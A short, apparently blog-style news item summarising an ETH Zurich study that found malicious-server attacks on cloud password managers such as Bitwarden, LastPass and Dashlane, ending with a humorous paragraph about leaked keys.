A study from ETH Zurich reveals security flaws in cloud password managers like Bitwarden, LastPass, and Dashlane. The researchers demonstrated that a compromised server can bypass protections and access or modify stored credentials. This contradicts the promise of zero-knowledge encryption, where the provider should not be able to see the data.
The Weak Link: Client-Server Architecture and HTTP Protocol ⛓️
The research identified that the problem lies in the implementation of the protocol between the client application and the server. By simulating a malicious server, they were able to intercept and manipulate HTTP responses during the synchronization process. This allowed injecting malicious JavaScript code into the client, which, once executed, extracts the master password or the decrypted vault, nullifying end-to-end encryption protection.
Your Master Password Sends Greetings (and the Rest of the Keys) 👋
So you entrusted your digital secrets to a system that promised to be an impregnable fortress. It turns out the front door had a complex lock, but the side window was wide open. It's a reminder that in security, the chain is as strong as its most... creative link. Now your bank key and Netflix one are on an unexpected trip to a Swiss server.